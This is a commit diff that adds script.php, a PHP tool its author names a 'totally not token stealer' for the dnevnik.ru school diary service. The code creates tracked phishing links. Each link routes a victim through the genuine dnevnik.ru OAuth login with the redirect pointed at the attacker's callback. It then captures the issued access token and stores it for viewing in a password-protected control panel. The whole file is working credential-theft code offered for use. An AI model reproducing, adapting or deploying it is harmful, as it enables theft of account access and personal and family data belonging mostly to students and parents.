This commit is contained in:
243
script.php
Normal file
243
script.php
Normal file
@@ -0,0 +1,243 @@
|
||||
<?php
|
||||
// totally not token stealer
|
||||
// for dnevnik.ru
|
||||
// =========================
|
||||
// by ktkz for tmb project
|
||||
// 2026
|
||||
|
||||
// go to .php?control to open control panel
|
||||
|
||||
// ===CONFIG===
|
||||
const PANEL_PASSWORD = "TOTALLYNOTSTEALERpassword1";
|
||||
|
||||
const DATA_FILE_PATH = "./totallynotstealeddata.php";
|
||||
const AUTH_URL = "https://login.dnevnik.ru/login/?ReturnUrl=";
|
||||
const OAUTH_URL = "https://login.dnevnik.ru/oauth2?response_type=token&client_id=b8006d75-70a9-4291-885c-13d8511bb2ae&scope=CommonInfo,EducationalInfo,FriendsAndRelatives&redirect_uri=";
|
||||
// ============
|
||||
|
||||
// ===PAGES===
|
||||
// NOTE: contains ai-generated styles and mine shitty while state-of-art template system
|
||||
// we use builder to mount these
|
||||
function LOGIN_PAGE(string $data)
|
||||
{
|
||||
return "<<BUILDER_MOUNT_FILE_(.\dev\html\login.html)>>";
|
||||
}
|
||||
function CONTROL_PAGE(string $data)
|
||||
{
|
||||
return "<<BUILDER_MOUNT_FILE_(.\dev\html\control.html)>>";
|
||||
}
|
||||
// ===========
|
||||
|
||||
// PREPARATION
|
||||
if (!file_exists(DATA_FILE_PATH)) {
|
||||
file_put_contents(
|
||||
DATA_FILE_PATH,
|
||||
'<?php // { "name": "tnts", "version": 1, "data": [] }',
|
||||
);
|
||||
}
|
||||
// ROUTER
|
||||
function path(string $p)
|
||||
{
|
||||
return count($_GET) > 0 && array_keys($_GET)[0] == $p;
|
||||
}
|
||||
|
||||
if (path("control")) {
|
||||
if (!isset($_GET["l"]) || $_GET["l"] == "") {
|
||||
echo LOGIN_PAGE("{}");
|
||||
exit();
|
||||
}
|
||||
if ($_GET["l"] != PANEL_PASSWORD) {
|
||||
echo LOGIN_PAGE('{error: "wrong password"}');
|
||||
exit();
|
||||
}
|
||||
// user authorized
|
||||
if (!in_array("do", array_keys($_GET))) {
|
||||
$config = readConfig();
|
||||
$error = "";
|
||||
if (isset($_GET["error"])) {
|
||||
$error = $_GET["error"];
|
||||
}
|
||||
echo CONTROL_PAGE(
|
||||
json_encode([
|
||||
"password" => $_GET["l"],
|
||||
"data" => $config,
|
||||
"error" => $error,
|
||||
]),
|
||||
);
|
||||
exit();
|
||||
}
|
||||
}
|
||||
|
||||
function readConfig()
|
||||
{
|
||||
$_ = json_decode(
|
||||
str_replace("<?php // ", "", file_get_contents(DATA_FILE_PATH)),
|
||||
true,
|
||||
);
|
||||
if ($_["name"] != "tnts" || !isset($_["data"])) {
|
||||
exit();
|
||||
}
|
||||
return $_["data"];
|
||||
}
|
||||
|
||||
function saveConfig(array $config)
|
||||
{
|
||||
$_ = ["name" => "tnts", "version" => 1, "data" => $config];
|
||||
file_put_contents(DATA_FILE_PATH, "<?php // " . json_encode($_));
|
||||
}
|
||||
// config type
|
||||
// {
|
||||
// {
|
||||
// "name": string,
|
||||
// "url": string,
|
||||
// "comment": string?,
|
||||
// "token": string?
|
||||
// }
|
||||
// }
|
||||
//
|
||||
// define status by token presence
|
||||
|
||||
if (
|
||||
isset($_GET["do"]) &&
|
||||
$_GET["do"] === "create" &&
|
||||
isset($_GET["url"]) &&
|
||||
isset($_GET["name"])
|
||||
) {
|
||||
if (!isset($_GET["l"]) || $_GET["l"] == "" || $_GET["l"] != PANEL_PASSWORD) {
|
||||
exit();
|
||||
}
|
||||
// create link
|
||||
$url = $_GET["url"];
|
||||
$name = $_GET["name"];
|
||||
$comment = $_GET["comment"] ?? null;
|
||||
|
||||
$config = readConfig();
|
||||
$matches = array_values(
|
||||
array_filter(
|
||||
$config,
|
||||
fn($item) => isset($item["name"]) && $item["name"] === $name,
|
||||
),
|
||||
);
|
||||
if (count($matches) != 0) {
|
||||
header(
|
||||
"Location: " .
|
||||
parse_url($_SERVER["REQUEST_URI"], PHP_URL_PATH) .
|
||||
"?control&l=" .
|
||||
$_GET["l"] .
|
||||
"&error=" .
|
||||
urlencode("url already exists"),
|
||||
true,
|
||||
302,
|
||||
);
|
||||
exit();
|
||||
}
|
||||
$config[] = [
|
||||
"name" => $name,
|
||||
"url" => $url,
|
||||
"comment" => $comment,
|
||||
"token" => null,
|
||||
];
|
||||
|
||||
saveConfig($config);
|
||||
header(
|
||||
"Location: " .
|
||||
parse_url($_SERVER["REQUEST_URI"], PHP_URL_PATH) .
|
||||
"?control&l=" .
|
||||
$_GET["l"],
|
||||
true,
|
||||
302,
|
||||
);
|
||||
}
|
||||
|
||||
if (isset($_GET["do"]) && $_GET["do"] === "delete" && isset($_GET["delete"])) {
|
||||
if (!isset($_GET["l"]) || $_GET["l"] == "" || $_GET["l"] != PANEL_PASSWORD) {
|
||||
exit();
|
||||
}
|
||||
$name = $_GET["delete"];
|
||||
$config = readConfig();
|
||||
$config = array_filter(
|
||||
$config,
|
||||
fn($item) => isset($item["name"]) && $item["name"] != $name,
|
||||
);
|
||||
saveConfig($config);
|
||||
header(
|
||||
"Location: " .
|
||||
parse_url($_SERVER["REQUEST_URI"], PHP_URL_PATH) .
|
||||
"?control&l=" .
|
||||
$_GET["l"],
|
||||
true,
|
||||
302,
|
||||
);
|
||||
exit();
|
||||
}
|
||||
|
||||
function getBaseUrl(): string
|
||||
{
|
||||
$scheme =
|
||||
!empty($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https" : "http";
|
||||
$host = $_SERVER["HTTP_HOST"] ?? ($_SERVER["SERVER_NAME"] ?? "");
|
||||
$script = $_SERVER["SCRIPT_NAME"] ?? ($_SERVER["PHP_SELF"] ?? "");
|
||||
return $scheme . "://" . $host . $script;
|
||||
}
|
||||
|
||||
if (isset($_GET["go"])) {
|
||||
$config = readConfig();
|
||||
$matches = array_values(
|
||||
array_filter(
|
||||
$config,
|
||||
fn($item) => isset($item["name"]) && $item["name"] == $_GET["go"],
|
||||
),
|
||||
);
|
||||
if (count($matches) == 0) {
|
||||
exit();
|
||||
}
|
||||
$goUrl = getBaseUrl() . "?callback&name=" . $_GET["go"];
|
||||
$redirect = AUTH_URL . rawurlencode(OAUTH_URL . rawurlencode($goUrl));
|
||||
header("Location: " . $redirect, true, 302);
|
||||
exit();
|
||||
}
|
||||
|
||||
if (path("info")) {
|
||||
header("Content-type: application/json");
|
||||
echo json_encode([
|
||||
"name" => "totally not token stealer",
|
||||
"version" => "1.0.0",
|
||||
"author" => "ktkz",
|
||||
]);
|
||||
}
|
||||
|
||||
if (path("callback") && isset($_GET["name"])) {
|
||||
$base = parse_url($_SERVER["REQUEST_URI"], PHP_URL_PATH);
|
||||
$config = readConfig();
|
||||
$matches = array_values(
|
||||
array_filter(
|
||||
$config,
|
||||
fn($item) => isset($item["name"]) && $item["name"] == $_GET["name"],
|
||||
),
|
||||
);
|
||||
if (count($matches) == 0) {
|
||||
exit();
|
||||
}
|
||||
|
||||
$send_url = $base . "?send&name=" . $_GET["name"];
|
||||
$redirect_url = $matches[0]["url"];
|
||||
|
||||
echo "<<BUILDER_MOUNT_FILE_(.\dev\html\callback.html)>>";
|
||||
exit();
|
||||
}
|
||||
|
||||
if (path("send") && isset($_GET["name"]) && isset($_GET["token"])) {
|
||||
$config = readConfig();
|
||||
$matches = array_values(
|
||||
array_filter(
|
||||
$config,
|
||||
fn($item) => isset($item["name"]) && $item["name"] == $_GET["name"],
|
||||
),
|
||||
);
|
||||
if (count($matches) == 0) {
|
||||
exit();
|
||||
}
|
||||
|
||||
$config[array_search($matches[0], $config)]["token"] = $_GET["token"];
|
||||
saveConfig($config);
|
||||
}
|
||||
Reference in New Issue
Block a user